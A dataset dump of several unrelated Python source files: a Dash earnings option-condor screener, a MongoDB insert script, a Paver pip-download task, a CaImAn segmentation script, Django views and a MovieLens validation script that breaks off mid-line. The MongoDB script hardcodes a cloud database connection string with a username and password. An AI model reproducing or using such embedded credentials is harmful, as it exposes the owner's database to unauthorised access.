Output('raw_container', 'hidden'),\n [Input('earnings_query', 'n_clicks')],\n [State('startdate','date'),\n State('forward_days','value'),\n State('max_gap','value'),\n State('dte_thresh','value'),\n State('strike_filter','value'),\n State('money_thresh','value'),\n\t\t State('bounds_adj','value')])\ndef cache_earnings(n_clicks, startdate, fwd_days, maxgap, dtethresh,\n strikefilter, moneythresh, boundsadj):\n\n global earnings_df, condors_df\n start_date = dt.datetime.strptime(startdate, '%Y-%m-%d')\n earnings_df = earnings(start_date, fwd_days)\n \n condors_df = condor_screener(earnings_df, max_gap = maxgap, dte_thresh = dtethresh, \n money_thresh = moneythresh, delta_thresh = 0.03, \n minimum_prem = 0.1, bounds_adj = boundsadj, \n rr_thresh = 0.1, strike_filter = strikefilter)\n \n print('Loaded raw data')\n return 'loaded'\n\n\n@app.callback(\n Output('e_table', 'rows'), \n [Input('earnings_show', 'n_clicks')],\n [State('raw_container', 'hidden')])\ndef update_e_table(n_clicks, hidden):\n if hidden == 'loaded':\n return earnings_df.to_dict('records')\n\n@app.callback(\n Output('c_table', 'rows'), \n [Input('condors_show', 'n_clicks')],\n [State('raw_container', 'hidden'),\n\t\t State('delta_thresh','value'),\n State('minimum_prem','value'),\n State('rr_thresh','value')])\ndef update_c_table(n_clicks, hidden, deltathresh, \n minimumprem, rrthresh):\n if hidden == 'loaded':\n filtered_condors = condors_df[(abs(condors_df['Delta']) <= deltathresh) & \n (condors_df['Premium'] >= minimumprem) & \n (condors_df['RiskRewardRatio'] >= rrthresh)]\n return filtered_condors.to_dict('records')\n\nif __name__ == '__main__':\n app.server.run(port=8000, debug=True, threaded=True, use_reloader=False)\n #app.run_server(debug = True)", "sub_path": "Earnings Scanner/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dash.Dash", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dash_html_components.Table", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 46, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 47, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 52, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 65, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Hr", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 87, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_core_components.DatePickerSingle", "line_number": 101, "usage_type": "call"}, {"api_name": 
"datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 111, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "dash_core_components.Slider", "line_number": 114, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 142, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 167, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 194, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 213, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 215, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 224, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 244, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 245, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 246, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 247, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 259, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 271, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 273, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 292, "usage_type": 
"call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 311, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 345, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Output", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 336, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 358, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 359, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 360, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 367, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 368, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 371, "usage_type": "call"}]}
+{"seq_id": "486986209", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nimport json\n\ndef connection():\n \"\"\"\n This function connect to the MongoDB\n \"\"\"\n client = MongoClient('mongodb+srv://backend:WvtTqCuH3nNkS5SL@holmes.ieany.mongodb.net/')\n db = client.holmes\n\n return db\n\ndef insert():\n new_conecction = connection()\n\n sale = new_conecction.sale\n rent = new_conecction.rent\n\n #Get the JSON document with the Values\n with open(r'.\\json\\property_sale.json') as json_file:\n property_sale = json.load(json_file)\n\n with open(r'.\\json\\property_rent.json') as json_file:\n property_rent = json.load(json_file)\n\n #Insert objects into MongoDB\n try:\n #Delete the Mongo documents, just for Test purpose\n \"\"\" print('Cleaning the BD...')\n sale.delete_many({})\n rent.delete_many({}) \"\"\"\n\n #Insert new Values\n print('Inserting new values...')\n result = sale.insert_many(property_sale)\n print('Property for sale were successfully inserted in DB')\n\n result = rent.insert_many(property_rent)\n print('Property for rent were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\ndef insert_cities(json):\n new_conecction = connection()\n\n cities = new_conecction.cities\n\n try:\n #Delete the Mongo documents, just for Test purpose\n print('Cleaning the BD...')\n cities.delete_many({})\n\n print('Inserting Cities')\n cities.insert_many(json)\n\n print('Cities were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\nif __name__ == \"__main__\":\n insert()", "sub_path": "backend/ds/scraper/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "363609930", "text": "# -*- coding: utf-8 -*-\n# ============================================================================\n# PAVER EXTENSION: Download dependencies with pip via requirements files\n# ============================================================================\n\"\"\"\nA paver extension that provides pip related tasks:\n - download dependent packages\n - build a local packages index for downloaded packages\n\nEXPECTED OPTIONS STRUCTURE:\n options.develop\n .requirements_files -- List of requirements files to use.\n .download_dir -- Directory for downloaded packages.\n\nREQUIRES:\n * paver >= 1.0.4\n * pip >= 1.1\n * pip2pi > 0.1.1 (for localpi)\n\nSEE ALSO:\n * http://www.blueskyonmars.com/projects/paver/\n * http://pypi.python.org/pypi/Paver/\n * http://pypi.python.org/pypi/pip/\n * http://pypi.python.org/pypi/pip2pi/\n\"\"\"\n\nfrom paver.easy import info, options, path, sh, task, call_task\n\n# ----------------------------------------------------------------------------\n# TASKS:\n# ----------------------------------------------------------------------------\n@task\ndef download_depends():\n \"\"\"Download all dependencies (python packages) with pip.\"\"\"\n download_dir = options.develop.download_dir\n info(\"DOWNLOAD ALL DEPENDENCIES: {0}/\".format(download_dir))\n pip_download(download_dir,\n requirements_files=options.develop.requirements_files)\n\n@task\ndef localpi():\n \"\"\"Make local package index (used by tox).\"\"\"\n download_dir = path(options.develop.download_dir)\n if not download_dir.exists():\n call_task(\"download_depends\")\n info(\"MAKE LOCAL PACKAGE-INDEX: {0}/\".format(download_dir))\n sh(\"dir2pi {download_dir}\".format(download_dir=download_dir))\n # -- ALTERNATIVE:\n # for reqs in requirement_files:\n # sh(\"pip2pi downloads -r {requirements}\".format(requirements=reqs))\n\n# ----------------------------------------------------------------------------\n# UTILS:\n# ----------------------------------------------------------------------------\ndef pip_download(download_dir, cmdopts=\"\", requirements_files=None):\n \"\"\"Download all dependencies with pip by using requirement files, etc.\"\"\"\n if not cmdopts and not requirements_files:\n assert False, \"Neither requirement_files nor cmdopts provided.\"\n\n # -- NORMAL-CASE:\n # NOTE: --exists-action option requires pip >= 1.1\n download_dir = path(download_dir)\n download_dir.makedirs()\n pip_download_cmd = \"pip install --no-install --exists-action=i\"\n pip_download_cmd += \" --download={0}\".format(download_dir)\n\n if requirements_files:\n # -- WITH REQUIREMENT FILES:\n for requirements_file in requirements_files:\n sh(\"{pip_download} {cmdopts} -r {requirements_file}\"\\\n .format(pip_download=pip_download_cmd, cmdopts=cmdopts,\n requirements_file=requirements_file))\n else:\n # -- NO REQUIREMENT FILES: Requirement in cmdopts, ala: argparse>=1.2\n assert cmdopts\n sh(\"{pip_download} {cmdopts}\".format(\n pip_download=pip_download_cmd, cmdopts=cmdopts))\n", "sub_path": "paver_ext/pip_download.py", "file_name": "pip_download.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "paver.easy.options.develop", "line_number": 35, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 35, "usage_type": "name"}, {"api_name": "paver.easy.info", "line_number": 36, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 38, 
"usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 38, "usage_type": "name"}, {"api_name": "paver.easy.task", "line_number": 32, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 43, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 43, "usage_type": "name"}, {"api_name": "paver.easy.call_task", "line_number": 45, "usage_type": "call"}, {"api_name": "paver.easy.info", "line_number": 46, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 47, "usage_type": "call"}, {"api_name": "paver.easy.task", "line_number": 40, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 62, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 70, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "620380323", "text": "\"\"\"\nThis not a part of NeuroAnalysisTools\nrun it in an environment with caiman installed\nin command line\n\nfor example:\n>>> activate ciaman\n\"\"\"\n\nimport os\nimport glob\nimport numpy as np\nimport caiman as cm\nfrom caiman.source_extraction import cnmf as cnmf\nimport h5py\nfrom shutil import copyfile\n\n\"\"\"\nthe most relevant parameter is K.\nSmaller K gives less ROIs.\nBigger K gives more ROIs\n\"\"\"\n\ndef run():\n\n date_recorded = '200210'\n mouse_id = 'M504408'\n resolution = (512, 512)\n channel = 'green'\n data_folder_n = '110_LSVDGCUC_reorged'\n imaging_mode = '2p' # '2p' or 'deepscope'\n n_process = 4\n\n # ========================= caiman parameters for boutons ================================================\n # ============ sutter scope, zoom 4, 5 frames online average, 5 frames offline average ===================\n # fr = 2. # frame rate (Hz)\n # decay_time = 0.5 # approximate length of transient event in seconds\n gSig = (5, 5) # expected half size of neurons, (8, 8) for soma at zoom 2 on sutter scope\n p = 2 # order of AR indicator dynamics\n # min_SNR = 3 # minimum SNR for accepting new components\n # rval_thr = 0.80 # correlation threshold for new component inclusion\n # ds_factor = 1 # spatial downsampling factor (increases speed but may lose some fine structure)\n # gnb = 2 # number of background components\n # gSig = tuple(np.ceil(np.array(gSig) / ds_factor).astype('int')) # recompute gSig if downsampling is involved\n mot_corr = False # flag for online motion correction\n pw_rigid = False # flag for pw-rigid motion correction (slower but potentially more accurate)\n # max_shifts_online = np.ceil(10. / ds_factor).astype('int') # maximum allowed shift during motion correction\n # sniper_mode = True # flag using a CNN to detect new neurons (o/w space correlation is used)\n # init_batch = 200 # number of frames for initialization (presumably from the first file)\n expected_comps = 500 # maximum number of expected components used for memory pre-allocation (exaggerate here)\n # dist_shape_update = True # flag for updating shapes in a distributed way\n # min_num_trial = 10 # number of candidate components per frame\n K = 10 # initial number of components\n # epochs = 2 # number of passes over the data\n show_movie = False # show the movie with the results as the data gets processed\n\n method_init = 'sparse_nmf'\n do_merge = False\n ssub = 1\n tsub = 1\n alpha_snmf = 10e1\n rolling_sum = False\n rf = 256\n p_ssub = 1\n p_tsub = 1\n # Ain = None\n # method_deconvolution = 'oasis'\n border_pix = 0\n # ========================= caiman parameters for boutons ================================================\n\n\n curr_folder = os.path.dirname(os.path.realpath(__file__))\n\n c, dview, n_processes = cm.cluster.setup_cluster(backend='local', n_processes=n_process, single_thread=False)\n\n data_folder = r\"\\\\allen\\programs\\braintv\\workgroups\\nc-ophys\\Jun\\raw_data\\{}-{}-{}\" \\\n r\"\\{}\".format(date_recorded, mouse_id, imaging_mode, data_folder_n)\n\n\n plane_ns = [f for f in os.listdir(data_folder) if\n os.path.isdir(os.path.join(data_folder, f)) and\n f[:5] == 'plane']\n plane_ns.sort()\n print('planes:')\n print('\\n'.join(plane_ns))\n\n for plane_n in plane_ns:\n\n print('\\nsegmenting plane: {}'.format(plane_n))\n\n plane_folder = os.path.join(data_folder, plane_n, channel, 'corrected')\n os.chdir(plane_folder)\n\n fn = [f for f in os.listdir(plane_folder) if len(f) > 16 and f[-5:] == '.mmap']\n if len(fn) > 1:\n 
print('\\n'.join(fn))\n raise LookupError('more than one file found.')\n elif len(fn) == 0:\n raise LookupError('no file found.')\n else:\n fn = fn[0]\n\n fp = os.path.join(os.path.realpath(plane_folder), fn)\n\n params_dict = {'fnames': [fp],\n # 'fr': fr,\n # 'decay_time': decay_time,\n 'gSig': gSig,\n 'p': p,\n # 'min_SNR': min_SNR,\n # 'rval_thr': rval_thr,\n # 'ds_factor': ds_factor,\n # 'nb': gnb,\n 'motion_correct': mot_corr,\n # 'init_batch': init_batch,\n # 'init_method': 'bare',\n # 'normalize': True,\n 'expected_comps': expected_comps,\n # 'sniper_mode': sniper_mode,\n # 'dist_shape_update': dist_shape_update,\n # 'min_num_trial': min_num_trial,\n 'K': K,\n # 'epochs': epochs,\n # 'max_shifts_online': max_shifts_online,\n 'pw_rigid': pw_rigid,\n 'show_movie': show_movie,\n\n # testing parameters\n 'method_init': method_init,\n 'do_merge': do_merge,\n 'ssub': ssub,\n 'tsub': tsub,\n 'alpha_snmf': alpha_snmf,\n 'rolling_sum': rolling_sum,\n 'rf': rf,\n 'p_ssub': p_ssub,\n 'p_tsub': p_tsub,\n # 'Ain': Ain,\n # 'method_deconvolution': method_deconvolution,\n 'border_pix': border_pix\n }\n\n opts = cnmf.params.CNMFParams(params_dict=params_dict)\n\n cnm1 = cnmf.CNMF(n_process, params=opts, dview=dview)\n cnm1.fit_file(motion_correct=False)\n\n roi_num = cnm1.estimates.A.shape[1]\n print('saving ...')\n save_f = h5py.File('caiman_segmentation_results.hdf5', 'w')\n save_f.create_dataset('masks',\n data=np.array(cnm1.estimates.A.todense()).T.reshape((roi_num, resolution[0], resolution[1]),\n order='F'), compression='lzf')\n save_f.create_dataset('traces', data=cnm1.estimates.C)\n save_f.close()\n\n copyfile(os.path.join(plane_folder, 'caiman_segmentation_results.hdf5'),\n os.path.join(curr_folder, plane_n, 'caiman_segmentation_results.hdf5'))\n\n # %% STOP CLUSTER and clean up log files\n cm.stop_server(dview=dview)\n log_files = glob.glob('*_LOG_*')\n for log_file in log_files:\n os.remove(log_file)\n\n\nif __name__ == '__main__':\n run()\n\n", "sub_path": "NeuroAnalysisTools/scripts/analysis_pipeline_movie/old/caiman_segmentation_bouton_mmap.py", "file_name": "caiman_segmentation_bouton_mmap.py", "file_ext": "py", "file_size_in_byte": 6389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 72, "usage_type": "call"}, {"api_name": "caiman.cluster.setup_cluster", "line_number": 74, "usage_type": "call"}, {"api_name": "caiman.cluster", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 103, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params.CNMFParams", "line_number": 143, 
"usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params", "line_number": 143, "usage_type": "attribute"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 143, "usage_type": "name"}, {"api_name": "caiman.source_extraction.cnmf.CNMF", "line_number": 145, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 145, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "caiman.stop_server", "line_number": 161, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 162, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 164, "usage_type": "call"}]}
+{"seq_id": "562859722", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Informer\nfrom landing.cc_forms import SocialForm, EmailCollectForm\n\n# Create your views here.\nipg_slider_list = (\"Смех до слез!\",\n \"Повод собраться с друзьями!\",\n \"Рабы которые создают игры для тебя!\",\n \"Гарантия отличного вечера!\",\n \"Органы по отличной цене!\",\n \"Театр абсурда у тебя дома!\",\n \"Черный юмор в самом соку!\",\n \"Вечные поиски логотипа!\",\n )\nipg_navbar = ((\"Главная\", \"main_page\"),\n \"Игры\",\n (\"Партнеры\", \"partners_list\"),\n (\"Связь\", \"games-contact\")\n )\n\n\ndef info_view(request):\n # Responds for main game lister\n queryset = Informer.objects.all()\n # email forms\n email_collect_form = EmailCollectForm(request.POST or None)\n if request.method == 'POST':\n if email_collect_form.is_valid():\n instance = email_collect_form.save(commit=False)\n instance.save()\n messages.success(request, 'Спасибо!')\n return HttpResponseRedirect('/')\n else:\n email_collect_form = EmailCollectForm()\n\n context = {'obj_list': queryset,\n 'email_form': email_collect_form,\n 'title': 'Main',\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'basetwo.html', context)\n\n\ndef games_contact_form(request):\n # here for header game list\n queryset = Informer.objects.all()\n # social form\n social_form = SocialForm(request.POST or None)\n if request.method == 'POST':\n if social_form.is_valid():\n instance = social_form.save(commit=False)\n instance.save()\n messages.success(request, 'Сообщение отправлено!')\n return HttpResponseRedirect('/contact/')\n else:\n social_form = SocialForm()\n\n context = {'social_form': social_form,\n 'obj_list': queryset,\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'contact.html', context)\n\n", "sub_path": "landing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Informer.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 27, "usage_type": "name"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Informer.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 50, "usage_type": "name"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 57, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": 
"call"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "362573624", "text": "#!/bin/env python3 -u\n\n#\n# Tests results of regression from t9a.py\n# andre@corp.insite.com.br - 2017-11-06\n#\n# parameters: t9c.py \n#\n\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport os\nimport time\nimport math\nimport sys\n\nparser = argparse.ArgumentParser(description='Test results of movielens regression.')\nparser.add_argument('logdir', nargs=1, help='directory with data from the tensorflow run')\nparser.add_argument('--ratings', nargs=1, help='file containing ratings to be tested', required = True)\nparser.add_argument('--movies', nargs=1, help='file containing movie info', required = True)\nparser.add_argument('--csvout', nargs=1, help='output file with test results', required = True)\n\n\nargs = parser.parse_args()\nlogdir = args.logdir[0]\nprint(\"Directory: {}\".format(logdir))\n\nsys.stdout = open(logdir + \"/validation.out\", \"w\", 1)\nsys.stderr = sys.stdout\n\nratfile = args.ratings[0]\nprint(\"Ratings File: {}\".format(ratfile))\ncsvout = args.csvout[0]\nprint(\"Output CSV file: {}\".format(csvout))\nmovies_file = args.movies[0]\nprint(\"Movies file: {}\".format(movies_file))\n\n\nif \"linear\" in logdir:\n print(\"Linear activation\")\n t_regression = \"linear\"\nelif \"asigmoid\" in logdir:\n print(\"sigmoid activation\")\n t_regression = \"sigmoid\"\nelse:\n print(\"Hmmm. directory doesn't have a recognized type of regression (sigmoid or linear)\")\n sys.exit(1)\n\nif not os.path.exists(logdir):\n print(\"Diretory doesn't exist\")\n sys.exit(2)\n\nif not os.path.isdir(logdir):\n print(\"{} is not a directory\".format(logdir))\n sys.exit(3)\n\nif not os.path.exists(ratfile):\n print(\"{} does not exist\")\n sys.exit(4)\n\n\nt0 = time.perf_counter()\ndef loga(msg):\n now = time.perf_counter()\n print(\"%6.2f: %s\" % (now - t0, msg))\n\nmemb = pd.read_csv(logdir + \"/movie_embeddings.csv.gz\", header = None)\nloga(\"Movie embeddings: {}\".format(memb.shape))\nuemb = pd.read_csv(logdir + \"/user_embeddings.csv.gz\", header = None)\nloga(\"User embeddings: {}\".format(uemb.shape))\nubias = pd.read_csv(logdir + \"/user_bias.csv.gz\", header=None)\nloga(\"User Bias: {}\".format(ubias.shape))\nmbias = pd.read_csv(logdir + \"/movie_bias.csv.gz\", header=None)\nloga(\"Movie Bias: {}\".format(mbias.shape))\nmovies = pd.read_csv(movies_file)\nloga(\"Movies: {}\".format(movies.shape))\n\nloga(\"Loading ratings...\")\nratings = pd.read_csv(ratfile)\nloga(\"Ratings: {}\".format(ratings.shape))\nuserIds = np.sort(ratings['userId'].unique())\nloga(\"Unique users: {}\".format(userIds.shape))\ncsvfname = logdir + \"/\" + csvout\nprint(\"opening csv output file: {}\".format(csvfname))\noutf=open(csvfname, \"w\", buffering = 1)\n\nnum_features = uemb.shape[1]\nmean_ratings = movies['mean_ratings']\n\nprint('\"context\",\"num_movies\",\"mean_error\",\"mse\"', file=outf)\n#loga(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n# (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n# np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\nfor userId in userIds:\n loga(\"==== userId: {}\".format(userId))\n user_ratings = ratings.loc[ratings['userId'] == userId]\n user_movieIds = user_ratings['movieId'].values\n predicted_ratings = movies.loc[user_movieIds,]['mean_ratings'].values\n actual_ratings = user_ratings['rating'].values\n diff = actual_ratings - predicted_ratings\n print(\"diffs: {}\".format(diff))\n\n old_user_vector = None\n 
#np.random.shuffle(user_ratings)\n\n validation_movieIds = user_ratings['movieId'].values\n num_movies = validation_movieIds.shape[0]\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(0, num_movies, \n np.mean(diff),\n np.mean(np.square(diff))), file=outf)\n\n for i in range(1, user_ratings.shape[0]):\n seen_movieIds = user_ratings[0:i]['movieId'].values\n validation_movieIds = user_ratings[i:]['movieId'].values\n # NUM_FEATURES x n\n #seen_actual_score = user_ratings[0:i]['rating'].values\n seen_actual_score = np.matrix(user_ratings[0:i]['rating']).T\n # TODO: precisa testar isto...\n seen_memb = memb.loc[seen_movieIds,] # (n, NUM_FEATURES)\n # loga(\"seen_movie embeddings: {}\".format(seen_memb))\n seen_movie_bias = mbias.loc[seen_movieIds].values\n #loga(\"DEBUG: seen_movie_bias: {} ({})\".format(seen_movie_bias, seen_movie_bias.shape))\n inversora = np.linalg.pinv(seen_memb)\n # loga(\"DEBUG: inverter matrix: {}\".format(inversora))\n score_offset = seen_actual_score - seen_movie_bias\n # loga(\"DEBUG: score offset: [{}] ({})\".format(score_offset.T, score_offset.shape))\n\n user_vector = np.matmul(inversora, score_offset)\n seen_user_bias = (score_offset - np.matmul(seen_memb, user_vector)).mean()\n if i == 1:\n rotation = 0\n else:\n loga(\"user_vector shapes: {} and {}\".format(old_user_vector.shape, user_vector.shape))\n rotation = np.matmul(np.transpose(old_user_vector), user_vector)/np.linalg.norm(old_user_vector)/np.linalg.norm(user_vector)\n if num_features > 1:\n try:\n loga(\" change in user vector: {}: {}: norm: {} to {}\".format(rotation, math.acos(rotation)*180/math.pi, np.linalg.norm(old_user_vector), 